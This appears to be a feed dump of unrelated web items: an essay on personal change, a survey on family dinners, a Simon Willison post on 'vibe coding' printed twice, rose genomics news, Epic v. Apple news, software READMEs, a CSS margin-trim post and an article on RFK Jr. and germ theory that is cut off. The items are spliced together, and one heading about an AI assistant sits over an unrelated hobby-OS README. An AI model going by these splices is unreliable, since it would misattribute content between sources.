that would visit the same group of a dozen or so Britons every seven years, starting at age seven; Apted envisioned the project—which was updated most recently in 2019, with “63 Up”—as a socioeconomic inquiry “about these kids who have it all, and these other kids who have nothing.” But, as the series has progressed, the chaos of individuality has encroached on the clarity of categorization. One participant has become a lay minister and gone into politics; another has begun helping orphans in Bulgaria; others have done amateur theatre, studied nuclear fusion, and started rock bands. One turned into a documentarian himself and quit the project. Real life, irrepressible in its particulars, has overpowered the schematic intentions of the filmmakers.
Even seemingly unimportant or trivial elements can contribute to who we are. Late this summer, I attended a family function with my father and my uncle. As we sat at an outside table, making small talk, our conversation turned to “Star Trek,” the sci-fi TV show that premièred in 1966. My father and uncle have both watched various incarnations of it since childhood, and my dad, in particular, is a genuine fan. While the party went on around us, we all recited from memory the original version’s opening monologue—“Space: the final frontier. These are the voyages of the Starship Enterprise. . . .”—and applauded ourselves on our rendition. “Star Trek” is a through line in my dad’s life. We tend to downplay these sorts of quirks and enthusiasms, but they’re important to who we are. When Leopold Bloom, the protagonist of James Joyce’s “
Ulysses
,” wanders through a Dublin cemetery, he is unimpressed by the generic inscriptions on the gravestones, and thinks they should be more specific. “So and So, wheelwright,” Bloom imagines, or, on a stone engraved with a saucepan, “I cooked good Irish stew.” Asked to describe ourselves, we might tend to talk in general terms, finding the details of our lives somehow embarrassing. But a friend delivering a eulogy would do well to note that we played guitar, collected antique telephones, and loved Agatha Christie and the Mets. Each assemblage of details is like a fingerprint. Some of us have had the same prints throughout our lives; others have had a few sets.
Focussing on the actualities of our lives might belie our intuitions about our own continuity or changeability. Galen Strawson, the philosopher who says that he has little sense of his life “as a narrative,” is best known for the arguments he’s made against the ideas of free will and moral responsibility; he maintains that we don’t have free will and aren’t ultimately responsible for what we do. But his father, Peter Strawson, was also a philosopher, and was famous for, among other things, defending those concepts. Galen Strawson can assure us that, from a first-person perspective, his life feels “episodic.” Yet, from the third-person perspective of an imagined biographer, he’s part of a long plot arc that stretches across lifetimes. We may feel discontinuous on the inside but be continuous on the outside, and vice versa. That sort of divergence may simply be unavoidable. Every life can probably be viewed from two angles.
I know two Tims, and they have opposing intuitions about their own continuities. The first Tim, my father-in-law, is sure that he’s had the same jovially jousting personality from two to seventy-two. He’s also had the same interests—reading, the Second World War, Ireland, the Wild West, the Yankees—for most of his life. He is one of the most self-consistent people I know. The second Tim, my high-school friend, sees his life as radically discontinuous, and rightly so. When I first met him, he was so skinny that he was turned away from a blood drive for being underweight; bullied and pushed around by bigger kids, he took solace in the idea that his parents were late growers. This notion struck his friends as far-fetched. But after high school Tim suddenly transformed into a towering man with an action-hero physique. He studied physics and philosophy in college, and then worked in a neuroscience lab before becoming an officer in the Marines and going to Iraq; he entered finance, but has since left to study computer science.
“I’ve changed more than most people I know,” Tim told me. He shared a vivid memory of a conversation he had with his mother, while they sat in the car outside an auto mechanic’s: “I was thirteen, and we were talking about how people change. And my mom, who’s a psychiatrist, told me that people tend to stop changing so much when they get into their thirties. They start to accept who they are, and to live with themselves as they are. And, maybe because I was an unhappy and angry person at the time, I found that idea offensive. And I vowed right then that I would never stop changing. And I haven’t stopped.”
Do the two Tims have the whole picture? I’ve known my father-in-law for only twenty of his seventy-two years, but even in that time he’s changed quite a bit, becoming more patient and compassionate; by all accounts, the life he lived before I met him had a few chapters of its own, too. And there’s a fundamental sense in which my high-school friend hasn’t changed. For as long as I’ve known him, he’s been committed to the idea of becoming different. For him, true transformation would require settling down; endless change is a kind of consistency.
Galen Strawson notes that there’s a wide range of ways in which people can relate to time in their lives. “Some people live in narrative mode,” he writes, and others have “no tendency to see their life as constituting a story or development.” But it’s not just a matter of being a continuer or a divider. Some people live episodically as a form of “spiritual discipline,” while others are “simply aimless.” Presentism can “be a response to economic destitution—a devastating lack of opportunities—or vast wealth.” He continues:
There are lotus-eaters, drifters, lilies of the field, mystics and people who work hard in the present moment. . . . Some people are creative although they lack ambition or long-term aims, and go from one small thing to the next, or produce large works without planning to, by accident or accretion. Some people are very consistent in character, whether or not they know it, a form of steadiness that may underwrite experience of the self’s continuity. Others are consistent in their inconsistency, and feel themselves to be continually puzzling and piecemeal.
The stories we tell ourselves about whether we’ve changed are bound to be simpler than the elusive reality. But that’s not to say that they’re inert. My friend Tim’s story, in which he vows to change forever, shows how such stories can be laden with value. Whether you perceive stasis or segmentation is almost an ideological question. To be changeable is to be unpredictable and free; it’s to be not just the protagonist of your life story but the author of its plot. In some cases, it means embracing a drama of vulnerability, decision, and transformation; it may also involve a refusal to accept the finitude that’s the flip side of individuality.
The alternative perspective—that you’ve always been who you are—bears values, too. James Fenton captures some of them in his poem “The Ideal”:
A self is a self.
It is not a screen.
A person should respect
What he has been.
This is my past
Which I shall not discard.
This is the ideal.
This is hard.
In this view, life is full and variable, and we all go through adventures that may change who we are. But what matters most is that we lived it. The same me, however altered, absorbed it all and did it all. This outlook also involves a declaration of independence—independence not from one’s past self and circumstances but from the power of circumstances and the choices we make to give meaning to our lives. Dividers tell the story of how they’ve renovated their houses, becoming architects along the way. Continuers tell the story of an august property that will remain itself regardless of what gets built. As different as these two views sound, they have a lot in common. Among other things, they aid us in our self-development. By committing himself to a life of change, my friend Tim might have sped it along. By concentrating on his persistence of character, my father-in-law may have nurtured and refined his best self.
The passage of time almost demands that we tell some sort of story: there are certain ways in which we can’t help changing through life, and we must respond to them. Young bodies differ from old ones; possibilities multiply in our early decades, and later fade. When you were seventeen, you practiced the piano for an hour each day, and fell in love for the first time; now you pay down your credit cards and watch Amazon Prime. To say that you are the same person today that you were decades ago is absurd. A story that neatly divides your past into chapters may also be artificial. And yet there’s value in imposing order on chaos. It’s not just a matter of self-soothing: the future looms, and we must decide how to act based on the past. You can’t continue a story without first writing one.
Sticking with any single account of your mutability may be limiting. The stories we’ve told may become too narrow for our needs. In the book “
Life Is Hard
,” the philosopher Kieran Setiya argues that certain bracing challenges—loneliness, failure, ill health, grief, and so on—are essentially unavoidable; we tend to be educated, meanwhile, in a broadly redemptive tradition that “urges us to focus on the best in life.” One of the benefits of asserting that we’ve always been who we are is that it helps us gloss over the disruptive developments that have upended our lives. But it’s good, the book shows, to acknowledge hard experiences and ask how they’ve helped us grow tougher, kinder, and wiser. More generally, if you’ve long answered the question of continuity one way, you might try answering it another. For a change, see yourself as either more continuous or less continuous than you’d assumed. Find out what this new perspective reveals.
There’s a recursive quality to acts of self-narration. I tell myself a story about myself in order to synchronize myself with the tale I’m telling; then, inevitably, I revise the story as I change. The long work of revising might itself be a source of continuity in our lives. One of the participants in the “Up” series tells Apted, “It’s taken me virtually sixty years to understand who I am.” Martin Heidegger, the often impenetrable German philosopher, argued that what distinguishes human beings is our ability to “take a stand” on what and who we are; in fact, we have no choice but to ask unceasing questions about what it means to exist, and about what it all adds up to. The asking, and trying out of answers, is as fundamental to our personhood as growing is to a tree.
Recently, my son has started to understand that he’s changing. He’s noticed that he no longer fits into a favorite shirt, and he shows me how he sleeps somewhat diagonally in his toddler bed. He’s been caught walking around the house with real scissors. “I’m a big kid now, and I can use these,” he says. Passing a favorite spot on the beach, he tells me, “Remember when we used to play with trucks here? I loved those times.” By this point, he’s actually had a few different names: we called him “little guy” after he was born, and I now call him “Mr. Man.” His understanding of his own growth is a step in his growing, and he is, increasingly, a doubled being—a tree and a vine. As the tree grows, the vine twines, finding new holds on the shape that supports it. It’s a process that will continue throughout his life. We change, and change our view of that change, for as long as we live. ♦
Just one in three British families eat together each day, survey finds
Guardian
www.theguardian.com
2025-05-01 15:43:55
Phones dominate dining tables as parents struggle for conversation, research for The Week Junior reveals A quarter of British families no longer talk at dinner, with most bringing their phones to the table and 42% of parents saying they struggle to find a topic of conversation, a survey of 2,000 hou...
A quarter of British families no longer talk at dinner, with most bringing their phones to the table and 42% of parents saying they struggle to find a topic of conversation, a survey of 2,000 households shows.
It found that just one in three families sit down to eat together every day and conversations are increasingly being replaced by scrolling and screens.
Two-thirds (66%) of children aged eight to 16 said they would rather eat in front of a TV or computer than with a parent, and 51% said they actively used their devices while eating.
However, it is not just young people who are increasingly being drawn towards their screens – 39% of children said they had to ask their parents to put down their phones at the table.
Commissioned by
The Week Junior
, a weekly news magazine for children, the research found that a reluctance to discuss current events was part of the reason why dinner-table conversation had fizzled out.
More than 70% of parents said they struggled to discuss the news with their children and 42% found it difficult to come up with a topic of conversation altogether.
In its latest edition, the magazine published a set of conversation cues for parents and children, such as: “If you were in charge of the country, what would you do?” and: “What’s one thing you would like to know more about?”
Vanessa Harriss, editor of The Week Junior, said: “In our fast-paced daily lives, being able to spend time together as a family can be a challenge and the digital distractions are ever more insistent.
“Whether it’s chatting about everyday things or discussing what’s going on in the news, family conversations boost children’s development and their wellbeing.”
The research found that despite worrying signs dinner-time conversation was dying out, children and parents were keen to bring it back. Of the children surveyed, 82% said they wanted dinner to be a special time set aside exclusively for conversation with their parents.
The majority said they enjoyed discussing a range of topics, from global affairs to playground drama, and 83% said they preferred having these conversations with their parents face to face at the table, rather than over the phone.
Of the parents, 93% said they would more consistently enforce dinner table rules if it helped their children’s development and 94% said they learned something from their children in two-way discussions.
Dr Elizabeth Kilbey, an author and child psychologist, said: “These simple, daily interactions can make a significant impact, not just in strengthening family ties but in cultivating a generation equipped to lead empathetically and thoughtfully.”
This year’s
World Happiness Report
examined the link between eating together and wellbeing for the first time. It found that dining alone was becoming more prevalent, especially among young people, but those who shared more meals with others reported significantly higher levels of life satisfaction and social support.
Two publishers and three authors fail to understand what "vibe coding" means
Vibe coding
does not mean “using AI tools to help write code”. It means “generating code with AI without caring about the code that is produced”. See
Not all AI-assisted programming is vibe coding
for my previous writing on this subject. This is a hill I am willing to die on. I fear it will be the death of me.
I just learned about not one but
two
forthcoming books that use vibe coding in the title and abuse that very clear definition!
Vibe Coding
by Gene Kim and Steve Yegge (published by IT Revolution) carries the subtitle “Building Production-Grade Software With GenAI, Chat, Agents, and Beyond”—exactly what vibe coding is not.
Vibe Coding: The Future of Programming
by Addie Osmani (published by O’Reilly Media) likewise talks about how professional engineers can integrate AI-assisted coding tools into their workflow.
I fear it may be too late for these authors and publishers to fix their embarrassing mistakes: they’ve already designed the cover art!
I wonder if this a new record for the time from a term being coined to the first published books that use that term entirely incorrectly.
Vibe coding was only coined by Andrej Karpathy on February 6th, 84 days ago. I will once again quote
Andrej’s tweet
, with my own highlights for emphasis:
There’s a new kind of coding I call “vibe coding”, where you fully give in to the vibes, embrace exponentials, and
forget that the code even exists
. It’s possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper so I barely even touch the keyboard.
I ask for the dumbest things like “decrease the padding on the sidebar by half” because I’m too lazy to find it. I “Accept All” always, I don’t read the diffs anymore. When I get error messages I just copy paste them in with no comment, usually that fixes it. The code grows beyond my usual comprehension, I’d have to really read through it for a while. Sometimes the LLMs can’t fix a bug so I just work around it or ask for random changes until it goes away.
It’s not too bad for throwaway weekend projects, but still quite amusing
. I’m building a project or webapp, but it’s not really coding—I just see stuff, say stuff, run stuff, and copy paste stuff, and it mostly works.
Andrej could not have stated this more clearly: vibe coding is when you
forget that the code even exists
, as a fun way to build
throwaway projects
. It’s not the same thing as using LLM tools as part of your process for responsibly building production code.
I know it’s harder now that tweets are longer than 480 characters, but it’s vitally important you
read to the end of the tweet
before publishing a book about something!
Now what do we call books on about real vibe coding?
This is the aspect of this whole thing that most disappoints me.
I think there is a real need for a book on
actual
vibe coding: helping people who are
not
software developers—and who don’t want to become developers—learn how to use vibe coding techniques
safely, effectively and responsibly
to solve their problems.
This is a rich, deep topic! Most of the population of the world are never going to learn to code, but thanks to vibe coding tools those people now have a path to building custom software.
Everyone deserves the right to automate tedious things in their lives with a computer. They shouldn’t have to learn programming in order to do that.
That
is who vibe coding is for. It’s not for people who are software engineers already!
There are so many questions to be answered here. What kind of projects can be built in this way? How can you avoid the traps around security, privacy, reliability and a
risk of over-spending
? How can you navigate the jagged frontier of things that can be achieved in this way versus things that are completely impossible?
A book for people like that could be a genuine bestseller! But because three authors and the staff of two publishers didn’t read to the end of the tweet we now need to find a new buzzy term for that, despite having the
perfect
term for it already.
I’d like the publishers and authors responsible to at least understand how much potential value—in terms of both helping out more people and making more money—they have left on the table because they didn’t read all the way to the end of the tweet.
The ancestor of roses could have had yellow, unspotted petals and leaves with seven leaflets. Credit: Anna Shvets: https://www.pexels.com/photo/person-holding-white-roses-bouquet-5894037/
Red roses, the symbol of love, were likely yellow in the past, indicates
a large genomic analysis
by researchers from Beijing Forestry University, China. Roses of all colors, including white, red, pink, and peach, belong to the genus Rosa, which is a member of the Rosaceae family.
Reconstructing the ancestral traits through genomic analysis revealed that all the roads trace back to a
common ancestor
—a single-petal flower with yellow color and seven leaflets.
The findings are published in
Nature Plants
.
Accounting for almost 30% of the cut flower market sales, roses are the most widely cultivated ornamental plants and have been successfully domesticated to reflect the aesthetic preferences of each era.
It all began with the rose breeding renaissance in the 1700s, marked by the crossing of ancient wild Chinese roses and old European cultivars—plants selectively bred through human intervention to develop a desirable characteristic.
Currently, we have over 150 to 200 species of roses and more than 35,000 cultivars, displaying a wide range of blooming frequencies, fragrances, and colors. However, global climate change has prompted rose breeders to shift their focus from purely cosmetic traits to breeding rose varieties that are more resistant to stress factors like drought, disease and easier to care for.
Borrowing genetic resources from wild rose varieties, which offer valuable traits such as fragrance and
disease resistance
, presents a promising strategy for breeding resilient, low-maintenance rose cultivars.
Genome sequencing of 205 samples representing 84 species reveal evolutionary and geographical history of the Rosa genus. Credit:
Nature Plants
(2025). DOI: 10.1038/s41477-025-01955-5
A clear understanding of the origin and evolution of the Rosa genus, both wild and cultivated varieties, can not only advance the breeding efforts but also aid in the conservation of near-threatened rose varieties.
Having this in mind, the researchers collected 205 samples of over 80 Rosa species, covering 84% of what is documented in the "Flora of China."
The samples were then analyzed using genomic sequencing,
population genetics
, and other methods to trace back their ancestral traits. They studied 707 single-copy genes uncovered as a set of conserved
genetic markers
like single-nucleotide polymorphisms—the most common type of genetic variation found in DNA—which helped them chart the evolutionary and geographical history and connections between the rose species.
Ancestral trait reconstruction showed that the shared ancestor of the studied samples was a yellow flower with a single row of petals and leaves divided into seven leaflets. As roses evolved and were domesticated, they developed new colors, distinct petal markings, and the ability to bloom in clusters.
The study also brought new insight to the widely accepted notion that the Rosa genus originated in Central Asia. The
genetic evidence
pointed to two major centers of
rose
diversity in China—one in the dry northwest, where yellow roses with small leaves grow, and another in the warm and humid southwest, where the white, fragrant variety thrives.
The researchers highlight that these findings provide a strong foundation for utilizing wild Rosa resources, which could assist in the re-domestication and innovative breeding of modern roses.
More information:
Bixuan Cheng et al, Phenotypic and genomic signatures across wild Rosa species open new horizons for modern rose breeding,
Nature Plants
(2025).
DOI: 10.1038/s41477-025-01955-5
Citation
:
Red, pink or white, all roses were once yellow says genomic analysis (2025, April 18)
retrieved 1 May 2025
from https://phys.org/news/2025-04-red-pink-white-roses-yellow.html
This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no
part may be reproduced without the written permission. The content is provided for information purposes only.
Apple Lost But That Doesn’t Mean Epic Won Anything
Daring Fireball
www.theverge.com
2025-05-01 15:30:09
Jay Peters, The Verge, under the headline “Epic Says Fortnite Is Coming Back to iOS in the US”:
Following a court order that blocks Apple from taking a commission
on purchases made outside the App Store, Epic Games CEO Tim
Sweeney says on X that the company plans to bring Fortnite
back to iOS in...
Jay Peters
is a news editor covering technology, gaming, and more. He joined The Verge in 2019 after nearly two years at Techmeme.
Following a court order that blocks Apple from taking a commission on purchases made outside the App Store, Epic Games CEO Tim Sweeney
says on X
that the company plans to bring
Fortnite
back to iOS in the US “next week.”
The app hasn’t been available on iOS in the US since August 2020, when Apple
kicked it off the App Store
for implementing Epic’s own in-app payment system in violation of Apple’s rules. Since then, Apple and Epic have been embroiled in an ongoing legal battle, including a ruling
more in Apple’s favor in 2021
and today’s ruling that is a major victory for Epic.
Sweeney also offered a “peace proposal” from Epic to Apple in his post on X. “If Apple extends the court’s friction-free, Apple-tax-free framework worldwide, we’ll return
Fortnite
to the App Store worldwide and drop current and future litigation on the topic.”
Apple didn’t immediately reply to a request for comment.
Two publishers and three authors fail to understand what "vibe coding" means
Simon Willison
simonwillison.net
2025-05-01 15:26:35
Vibe coding does not mean "using AI tools to help write code". It means "generating code with AI without caring about the code that is produced". See Not all AI-assisted programming is vibe coding for my previous writing on this subject. This is a hill I am willing to die on. I fear it will be the d...
Vibe coding
does not mean “using AI tools to help write code”. It means “generating code with AI without caring about the code that is produced”. See
Not all AI-assisted programming is vibe coding
for my previous writing on this subject. This is a hill I am willing to die on. I fear it will be the death of me.
I just learned about not one but
two
forthcoming books that use vibe coding in the title and abuse that very clear definition!
Vibe Coding
by Gene Kim and Steve Yegge (published by IT Revolution) carries the subtitle “Building Production-Grade Software With GenAI, Chat, Agents, and Beyond”—exactly what vibe coding is not.
Vibe Coding: The Future of Programming
by Addie Osmani (published by O’Reilly Media) likewise talks about how professional engineers can integrate AI-assisted coding tools into their workflow.
I fear it may be too late for these authors and publishers to fix their embarrassing mistakes: they’ve already designed the cover art!
I wonder if this a new record for the time from a term being coined to the first published books that use that term entirely incorrectly.
Vibe coding was only coined by Andrej Karpathy on February 6th, 84 days ago. I will once again quote
Andrej’s tweet
, with my own highlights for emphasis:
There’s a new kind of coding I call “vibe coding”, where you fully give in to the vibes, embrace exponentials, and
forget that the code even exists
. It’s possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper so I barely even touch the keyboard.
I ask for the dumbest things like “decrease the padding on the sidebar by half” because I’m too lazy to find it. I “Accept All” always, I don’t read the diffs anymore. When I get error messages I just copy paste them in with no comment, usually that fixes it. The code grows beyond my usual comprehension, I’d have to really read through it for a while. Sometimes the LLMs can’t fix a bug so I just work around it or ask for random changes until it goes away.
It’s not too bad for throwaway weekend projects, but still quite amusing
. I’m building a project or webapp, but it’s not really coding—I just see stuff, say stuff, run stuff, and copy paste stuff, and it mostly works.
Andrej could not have stated this more clearly: vibe coding is when you
forget that the code even exists
, as a fun way to build
throwaway projects
. It’s not the same thing as using LLM tools as part of your process for responsibly building production code.
I know it’s harder now that tweets are longer than 480 characters, but it’s vitally important you
read to the end of the tweet
before publishing a book about something!
Now what do we call books on about real vibe coding?
This is the aspect of this whole thing that most disappoints me.
I think there is a real need for a book on
actual
vibe coding: helping people who are
not
software developers—and who don’t want to become developers—learn how to use vibe coding techniques
safely, effectively and responsibly
to solve their problems.
This is a rich, deep topic! Most of the population of the world are never going to learn to code, but thanks to vibe coding tools those people now have a path to building custom software.
Everyone deserves the right to automate tedious things in their lives with a computer. They shouldn’t have to learn programming in order to do that.
That
is who vibe coding is for. It’s not for people who are software engineers already!
There are so many questions to be answered here. What kind of projects can be built in this way? How can you avoid the traps around security, privacy, reliability and a
risk of over-spending
? How can you navigate the jagged frontier of things that can be achieved in this way versus things that are completely impossible?
A book for people like that could be a genuine bestseller! But because three authors and the staff of two publishers didn’t read to the end of the tweet we now need to find a new buzzy term for that, despite having the
perfect
term for it already.
I’d like the publishers and authors responsible to at least understand how much potential value—in terms of both helping out more people and making more money—they have left on the table because they didn’t read all the way to the end of the tweet.
portable
: runs on embedded devices (Cervantes, Kindle, Kobo, PocketBook, reMarkable), Android and Linux computers. Developers can run a KOReader emulator in Linux and MacOS.
multi-format documents
: supports fixed page formats (PDF, DjVu, CBT, CBZ) and reflowable e-book formats (EPUB, FB2, Mobi, DOC, RTF, HTML, CHM, TXT). Scanned PDF/DjVu documents can also be reflowed with the built-in K2pdfopt library.
ZIP files
are also supported for some formats.
full-featured reading
: multi-lingual user interface with a highly customizable reader view and many typesetting options. You can set arbitrary page margins, override line spacing and choose external fonts and styles. It has multi-lingual hyphenation dictionaries bundled into the application.
integrated
with
calibre
(search metadata, receive ebooks wirelessly, browse library via OPDS),
Wallabag
,
Wikipedia
,
Google Translate
and other content providers.
optimized for e-ink devices
: custom UI without animation, with paginated menus, adjustable text contrast, and easy zoom to fit content or page in paged media.
extensible
: via plugins
fast
: on some older devices, it has been measured to have less than half the page-turn delay as the built in reading software.
and much more
: look up words with StarDict dictionaries / Wikipedia, add your own online OPDS catalogs and RSS feeds, over-the-air software updates, an FTP client, an SSH server, …
Please check the
user guide
and the
wiki
to discover more features and to help us document them.
Screenshots
Installation
Please follow the model specific steps for your device:
If you write a lot of CSS, you are familiar with those moments when you aren’t quite sure how to accomplish what you want to accomplish. Usually, you’ll turn to tutorials or documentation, and learn more about CSS to get your work done. But every once in a while, you realize there is no “proper” way to do what you want to do. So you come up with (or borrow) a solution that feels hacky. Maybe it requires a lot of complex selectors. Or maybe it works for the content you have at the moment, but you worry that someday, someone might throw different HTML at the site, and the solution you wrote will break.
CSS has matured a lot over the last decade. Many robust solutions filled in gaps that previously required fragile hacks. And now, there’s one more —
margin-trim
.
Margin trim
The
margin-trim
property lets you tell a container to trim the margins off its children — any margins that push up against the container. In one fell swoop, all of the space between the children and the container is eliminated.
This also works when the margins are on the grandchildren or great grand-children, or great great great great grand-children. If there is space created with margins on any of the content inside the container, and that space buts up against the container, it’s trimmed away when
margin-trim
is applied
to the container.
Let’s imagine a practical example. Let’s say we have multiple paragraphs inside an
article
element, and those paragraphs have margins. Also at the same time, the container has padding on it.
This is very typical code. The padding on the container is supposed to create an even amount of space all the way around the box, but instead there’s extra white space above and below the content. Like this:
By
using
1lh
for the margins between the paragraphs
, and
2lh
for the padding on the
article
box, we’re attempting to create a beautiful typographic layout. Let’s turn on some guides to better see where the extra space is coming from. The padding on the article box is seen here in yellow, while the paragraph margins are marked in green.
The margins on the first and last paragraphs (
1lh
) are being added to the padding (
2lh
) to create a space in the block direction that measures
3lh
.
It will be better for the design if we get rid of the margin above the first paragraph and the margin below the last paragraph. Before we had
margin-trim
, we would attempt to remove the margins from the first and last paragraphs, or lessen the padding in the block direction… but any approach we take will be dependent on the content inside. Perhaps another instance of this
article
will start with a headline that has a different amount for a top margin. Or start with an image that has no margin.
Without being 100% sure of what kind of content will be in the box, it’s hard to guarantee the spacing will come out as desired. Until now.
The new
margin-trim
property gives us an easy way to ask directly for what we want. We can tell the box to eliminate any margins that are butting up against that box.
Now the browser automatically chops off any margins that touch the edge of the
article
box in the block direction — in this case the top and bottom of the box.
Note that while the margins are defined on the
<p>
element, you declare
margin-trim
on the
<article>
element. You always apply
margin-trim
to the container, not the element that has the margin in the first place.
Here’s the end result.
Try it yourself
You can try out
margin-trim
in
this live demo
, in Safari 16.4 or greater.
Browser Support
Support for
margin-trim
shipped in Safari over two years ago. But so far, Safari is the only
browser with support
. So what should you do for browsers without support? For our demo, you could write fallback code inside of feature queries, like this:
This helps to clarify the difference between
margin-trim
and the older techniques we’ve been using.
When using
:first-child
and
:last-child
any element that’s the first or last
direct child of the container
will have its margins trimmed. But any content that either isn’t wrapped in an element, or that is nested further down in the DOM structure will not.
For example, if the first element is a figure with a top margin, and the figure contains an image that also has a top margin, both of those margins will be trimmed by
margin-trim
, while only the figure margin will be trimmed by
:first-child
.
CSS has never been better. It’s my hope you learn about small improvements like this one, and use it to write more robust code. Let me know what you think on
Bluesky
or
Mastodon
. I’d love to hear your stories, feature requests, and questions.
OSS command-line AI assistant inspired by OpenAI Codex for local LLMs
There are 3 default users: system, admin and guest. The password for admin is 'admin', while guest has no password.
Currently there is no difference between admin and guest.
You can create a user with the 'admin' command:
admin create <username><password>
Built With
This project is built with C & Assembly for the kernel, utilities and build system. C++ for userspace applications and Make for compilation.
Docker used for crossplatform compilation.
Check that all dependencies are installed (Only for debian based distros)
Initialize Git submodules (C-Compiler)
git submodule update --init --recursive
Compile and create image
Launch QEMU
Use GRUB (Optional)
MacOS
Currently MacOS cannot natively compile the build tools as they depend on 32bit x86 code.
Docker is the simplest way if you still wish to compile the operating system.
git-sqlite is a collection of shell scripts that allows a sqlite database
to be tracked using the git version control system.
It can be used on an existing database, however, UUIDs will make
multi-master distribution substantially easier.
See src/schema.sql after building the project for an example.
USAGE GUIDE
create a new database using the git-sqlite example schema:
git-sqlite init newdatabase.db
attach the database to your repository (has to be done once for each repo):
git-sqlite attach newdatabase.db
show a diff using the git-sqlite diff driver:
git show-sql <COMMIT SHA>
resolve a merge conflict (after manually editing the merge_file)
INSTALLING GIT-SQLITE
Dependencies:
sqlite3
sqldiff
bash
git
autotools (build-essential debian repositories)
As of Debian Stretch (release 9), sqldiff is included with the default sqlite3 apt package.
If it is not available for your distribution, see
INSTALLING SQLDIFF
below.
If you are installing from the git src:
./reconf
./configure
sudo make install
If you are installing from a release, do this:
./configure
sudo make install
INSTALLING SQLDIFF
wget https://www.sqlite.org/src/tarball/sqlite.tar.gz?r=release
tar xzf sqlite.tar.gz?r=release
cd sqlite
./configure
make sqldiff
sudo install sqldiff /usr/local/bin/
In his 2021 book vilifying Anthony Fauci, RFK Jr. lays out support for an alternate theory.
Health and Human Services Secretary Robert F. Kennedy Jr. speaks at a news conference on removing synthetic dyes from America's food supply, at the Health and Human Services Headquarters in Washington, DC on April 22, 2025.
Credit:
Getty | Nathan Posner
With the rise of Robert F. Kennedy Jr., brain worms have gotten a bad rap.
A year ago, the long-time anti-vaccine advocate and current US health secretary famously told The New York Times that a parasitic worm "
got into my brain and ate a portion of it and then died
." The startling revelation is now frequently referenced whenever Kennedy says something outlandish, false, or offensive—which is often. For those who have followed his anti-vaccine advocacy, it's frightfully clear that, worm-infested or not, Kennedy's brain is marinated in wild conspiracy theories and dangerous misinformation.
While it's certainly possible that worm remnants could impair brain function, it remains unknown if the worm is to blame for Kennedy's cognitive oddities. For one thing, he was also diagnosed with mercury poisoning, which can cause brain damage, too. As prominent infectious disease expert Anthony Fauci said last June
in a conversation
with political analyst David Axelrod: "I don't know what's going on in [Kennedy's] head, but it's not good."
The trouble is that now that Kennedy is the country's top health official, his warped ideas are contributing to the rise of a dystopian reality. Federal health agencies are spiraling into chaos, and critical public health services for Americans have been brutally slashed, dismantled, or knee-capped—from
infectious disease responses
, the
lead poisoning team
, and
Meals on Wheels
to
maternal health programs
and
anti-smoking initiatives
, just to name a few. The health of the nation is at stake; the struggle to understand what goes on in Kennedy's head is vital.
While we may never have definitive answers on his cognitive situation, one thing is plain: Kennedy's thoughts and actions make a lot more sense when you realize he doesn't believe in a foundational scientific principle: germ theory.
Dueling theories
Germ theory is, of course, the 19th-century proven idea that microscopic germs—pathogenic viruses, bacteria, parasites, and fungi—cause disease. It supplanted the leading explanation of disease at the time,
the miasma theory
, which suggests that diseases are caused by
miasma
, that is, noxious mists and vapors, or simply bad air arising from decaying matter, such as corpses, sewage, or rotting vegetables. While the miasma theory was abandoned, it is
credited with spurring improvements in sanitation and hygiene
—which, of course, improve health because they halt the spread of germs, the cause of diseases.
Germ theory also knocks back a lesser-known idea called the terrain theory, which
we've covered before
. This is a somewhat ill-defined theory that generally suggests diseases stem from imbalances in the internal "terrain" of the body, such as malnutrition or the presence of toxic substances. The theory is linked to ideas by French scientist Antoine Béchamp and French physiologist Claude Bernard.
Béchamp, considered a bitter crank and rival to famed French microbiologist Louis Pasteur, is perhaps best known for wrongly suggesting the basic unit of organisms is not the cell, but nonexistent microanatomical elements he called "
microzyma
." While the idea was
largely ignored by the scientific community
, Béchamp suggested that disruptions to microzyma are a predisposition to disease, as is the state of the body's "terrain." French physiologist Claude Bernard, meanwhile, came up with an idea of balance or stability of the body's internal environment (
milieu intérieur
), which was a precursor to the concept of homeostasis. Ideas from the two figures came together to create an ideology that has been enthusiastically adopted by modern-day germ theory denialists, including Kennedy.
It's important to note here that our understanding of Kennedy's disbelief in germ theory isn't based on speculation or deduction; it's based on Kennedy's own words. He wrote an entire section on it in his 2021 book vilifying Fauci, titled
The Real Anthony Fauci
.
The section is titled "Miasma vs. Germ Theory," in the chapter "The White Man's Burden."
But, we did reach out to Health and Human Services to ask how Kennedy's disbelief in germ theory influences his policy decisions. HHS did not respond.
Kennedy’s beliefs
In the chapter, Kennedy promotes the "miasma theory" but gets the definition completely wrong. Instead of actual miasma theory, he describes something more like terrain theory. He writes: "'Miasma theory' emphasizes preventing disease by fortifying the immune system through nutrition and by reducing exposures to environmental toxins and stresses."
Kennedy contrasts his erroneous take on miasma theory with germ theory, which he derides as a tool of the pharmaceutical industry and pushy scientists to justify selling modern medicines. The abandonment of miasma theory, Kennedy bemoans, realigned health and medical institutions to "the pharmaceutical paradigm that emphasized targeting particular germs with specific drugs rather than fortifying the immune system through healthy living, clean water, and good nutrition."
According to Kennedy, germ theory gained popularity, not because of the undisputed evidence supporting it, but by "mimicking the traditional explanation for disease—demon possession—giving it a leg up over miasma."
To this day, Kennedy writes, a "$1 trillion pharmaceutical industry pushing patented pills, powders, pricks, potions, and poisons, and the powerful professions of virology and vaccinology led by 'Little Napoleon' himself, Anthony Fauci, fortify the century-old predominance of germ theory."
In all, the chapter provides a clear explanation of why Kennedy relentlessly attacks evidence-based medicines; vilifies the pharmaceutical industry;
suggests HIV doesn't cause AIDS and antidepressants are behind mass shootings
; believes that vaccines are harmful, not protective; claims
5G wireless networks cause cancer
; suggests chemicals in water are changing children's gender identities; and is quick to promote supplements to prevent and treat diseases, such as recently recommending vitamin A for measles and falsely claiming children who die from the viral infection are malnourished.
A religious conviction
For some experts, the chapter was like a light bulb going on. "I thought 'it now all makes sense'... I mean, it all adds up," Paul Offit, pediatrician and infectious disease expert at Children's Hospital of Philadelphia, told Ars Technica. It's still astonishing, though, he added. "It's so unbelievable, because you can't imagine that someone who's the head of Health and Human Services doesn't believe that specific viruses or bacteria cause specific diseases, and that the prevention or treatment of them is lifesaving."
Offit has a dark history with Kennedy. Around 20 years ago, Kennedy called Offit out of the blue to talk with him about vaccine safety. Offit knows a lot about it—he's not only an expert on vaccines, he's the
co-inventor of one
.
The vaccine he co-developed
,
RotaTeq
